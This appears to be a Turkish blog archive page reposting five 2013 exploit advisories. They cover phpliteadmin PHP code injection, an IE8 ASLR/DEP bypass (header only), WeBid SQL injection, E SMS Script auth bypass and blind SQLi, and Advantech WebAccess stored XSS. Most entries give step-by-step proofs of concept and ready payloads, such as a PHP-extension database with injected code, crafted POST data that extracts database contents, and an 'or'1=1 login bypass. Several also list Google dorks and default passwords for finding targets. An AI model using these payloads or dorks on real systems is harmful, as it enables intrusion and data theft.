Archive for 11 Ocak 2013

phpliteadmin 1.9.3 Remote PHP Code Injection Vulnerability

phpliteadmin 1.9.3 versiyonunda Uzaktan Kod Çalıştırma Açığı bulunmuş olup açık bulucunun açığın oluşum yerleri hakkındaki açıklamaları şu şekildedir;

 
# Exploit Title: phpliteadmin <= 1.9.3 Remote PHP Code Injection Vulnerability
# Google Dork: inurl:phpliteadmin.php (Default PW: admin)
# Date: 01/10/2013
# Exploit Author: L@usch - http://la.usch.io - http://la.usch.io/files/exploits/phpliteadmin-1.9.3.txt
# Vendor Homepage: http://code.google.com/p/phpliteadmin/
# Vendor Status: Informed
# Software Link: http://phpliteadmin.googlecode.com/files/phpliteadmin_v1-9-3.zip
# Version: 1.9.3
# Tested on: Windows and Linux

Description:

phpliteadmin.php#1784: 'Creating a New Database' => 
phpliteadmin.php#1785: 'When you create a new database, the name you entered will be appended with the appropriate file extension (.db, .db3, .sqlite, etc.) if you do not include it yourself. The database will be created in the directory you specified as the $directory variable.',

An Attacker can create a sqlite Database with a php extension and insert PHP Code as text fields. When done the Attacker can execute it simply by access the database file with the Webbrowser.

Proof of Concept:

1. We create a db named "hack.php".
(Depending on Server configuration sometimes it will not work and the name for the db will be "hack.sqlite". Then simply try to rename the database / existing database to "hack.php".)
The script will store the sqlite database in the same directory as phpliteadmin.php.
Preview: http://goo.gl/B5n9O
Hex preview: http://goo.gl/lJ5iQ

2. Now create a new table in this database and insert a text field with the default value:
<?php phpinfo()?>
Hex preview: http://goo.gl/v7USQ

3. Now we run hack.php

Done!

Proof: http://goo.gl/ZqPVL

Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass

internet Explorer 8 versiyonunda tehlikeli bir açık bulundu.
Exploiti açmaya antivirler izin vermediğinden exploit eklenmemiştir.
Açığın tanıtımı şu şekilde.

 
<!-- 
** Exploit Title: Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass 
** Author: sickness@offsec.com 
** Thanks to Ryujin and Dookie for their help. 

#################################################################### 

** Affected Software: Internet Explorer 8 

** Vulnerability: Fixed Col Span ID 

** CVE: CVE-2012-1876 

** Metasploit exploit using NON-ASLR DLL: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_037_ie_colspan.rb 

** Vupen Blog post: http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php 

** Tested on Windows 7 (x86) - IE 8.0.7601.17514 
#################################################################### 

** The exploit bypasses ASLR without the need of any NON-ASLR dll's using a leak 🙂  

** To get it working on a different version of Windows you will require to make your own chances to the exploit 🙂  
** Have fun 🙂 
--> 

WeBid 1.0.6 SQL Injection Vulnerability

WeBid 1.0.6 versiyonunda SQL injection açığı bulunmuş olup açık bulucunun açık hakkında açıklamaları ve açığın bulunduğu yere ilişkin bildirimi.

 # Exploit Title: WeBid 1.0.6 SQL Injection Vulnerability
# Google Dork: "Powered by WeBid"
# Date: 1/9/13
# Exploit Author: Life Wasted
# Vendor Homepage: http://www.webidsupport.com/
# Version: Tested on 1.0.6, but could affect other version
# Tested On: Linux, Windows

Vulnerable Code:
Line 53 of the validate.php file
Lines 198 through 202 and 234 in the includes/functions_fees.php file

Proof of Concept:
validate.php?toocheckout=asdf calls the toocheckout_validate() function
toocheckout_validate() takes unsanitized post input from 2 different parameters (total and cart_order_id)
toocheckout_validate() calls callback_process() if the post parameter credit_card_processed is equal to 'Y'
The unsanitized parameters are using in an UPDATE query:
$query = "UPDATE " . $DBPrefix . "users SET balance = balance + " . $payment_amount . $addquery . " WHERE id = " . $custom_id;
This allows an attacker to retrieve data using a time-based blind injection technique or by updating a pre-existing value to the output of an embedded query.

For example, the attacker could send the following post data to extract the name of the current database.

http://site.com/validate.php?toocheckout=asdf
POST DATA: cart_order_id=*Attackers UserID*WEBID1&credit_card_processed=Y&total=1, name=(SELECT database())

The resulting query would be:
UPDATE users SET balance = balance + 1, name=(SELECT database()) WHERE id = *Attackers User ID*

Then the attacker could sign in to their account and view the requested data by going to the edit_data.php page 		 	   		   

E SMS Script Multiple SQL Injection Vulnerabilities

smscollection.php?cat_id= bölümünde blint sql açığı bulunmuş olup, açık sayesinde verilere ulaşılabilmekte

# E SMS Script Multiple SQL Injection Vulnerability
# By cr4wl3r http://bastardlabs.info
# http://bastardlabs.info/exploits/E_SMS_Script.txt
# Good Music: http://goo.gl/TLkEs 🙂
# Script: http://www.esmsscript.com/index.php?option=com_content&view=article&id=22&Itemid=41
# Dork: inurl:"smscollection.php?cat_id="

Proof of concept:

Auth Bypass

  http://bastardlabs/admin/adminlogin.php
  Username: cr4wl3r
  Password: 'or'1=1

Blind SQLi

  http://bastardlabs/smscollection.php?cat_id=[Blind SQLi]

Advantech WebAccess HMI/SCADA Software Persistence XSS Vulnerability

##############################################################################
#
# Title    : Advantech WebAccess HMI/SCADA Software Persistence Cross-Site
#            Scripting Vulnerability
# Author   : Antu Sanadi SecPod Technologies (www.secpod.com)
# Vendor   : http://webaccess.advantech.com/
# Advisory : http://secpod.org/blog/?p=569
#	         http://secpod.org/advisories/SecPod_Advantech_WebAccess_Stored_XSS_Vuln.txt
# Software : Advantech WebAccess HMI/SCADA Software 7.0-2012.12.05
# Date     : 08/01/2013
#
###############################################################################

SecPod ID: 1046                                 10/12/2012 Issue Discovered
                                                18/12/2012 Vendor Notified
                                                No Response from vendor
                                                08/01/2013 Advisory Released


Class: Cross-Site Scripting                     Severity: High


Overview:
---------
Advantech WebAccess HMI/SCADA Software Persistence Cross-Site Scripting
Vulnerability.


Technical Description:
----------------------
Advantech WebAccess HMI/SCADA Software Persistence Cross-Site Scripting
Vulnerability.

Input passed via the 'ProjDesc' parameter in 'broadWeb/include/gAddNew.asp'
(when tableName=pProject set) page is not properly verified before it is
returned to the user. This can be exploited to execute arbitrary HTML and
script code in a user's browser session in the context of a vulnerable site.

The vulnerabilities are tested in Advantech WebAccess 7.0-2012.12.05 Other
versions  may also be affected.


Impact:
--------
Successful exploitation will allow a remote authenticated attacker to execute
arbitrary HTML code in a user's browser session in the context of a vulnerable
application.


Affected Software:
------------------
Advantech WebAccess HMI/SCADA Software 7.0-2012.12.05

Tested on Advantech WebAccess HMI/SCADA Software 7.0-2012.12.05 on Windows XP SP3


References:
-----------
http://secpod.org/blog/?p=569
http://webaccess.advantech.com
http://secpod.org/advisories/SecPod_Advantech_WebAccess_Stored_XSS_Vuln.txt


Proof of Concept:
-----------------

1) Login into project management interface 
   http://IP-Address/broadWeb/bwconfig.asp?username=admin
2) Go to http://IP-Address/broadweb/bwproj.asp
3) Create New Project with Project Description as <script>alert("XSS")<script>
4) Now Java script '<script>alert("XSS")<script>' will be executed, 
   when 'bwproj.asp' will be loaded


Solution:
----------
Fix not available


Risk Factor:
-------------
    CVSS Score Report:
        ACCESS_VECTOR          = NETWORK
        ACCESS_COMPLEXITY      = MEDIUM
        AUTHENTICATION         = SINGLE INSTANCE
        CONFIDENTIALITY_IMPACT = NONE
        INTEGRITY_IMPACT       = COMPLETE
        AVAILABILITY_IMPACT    = NONE
        EXPLOITABILITY         = PROOF_OF_CONCEPT
        REMEDIATION_LEVEL      = UNAVAILABLE
        REPORT_CONFIDENCE      = CONFIRMED
        CVSS Base Score        = 6.3 (High) (AV:N/AC:M/Au:SI/C:N/I:C/A:N)


Credits:
--------
Antu Sanadi of SecPod Technologies has been credited with the discovery of this
vulnerability.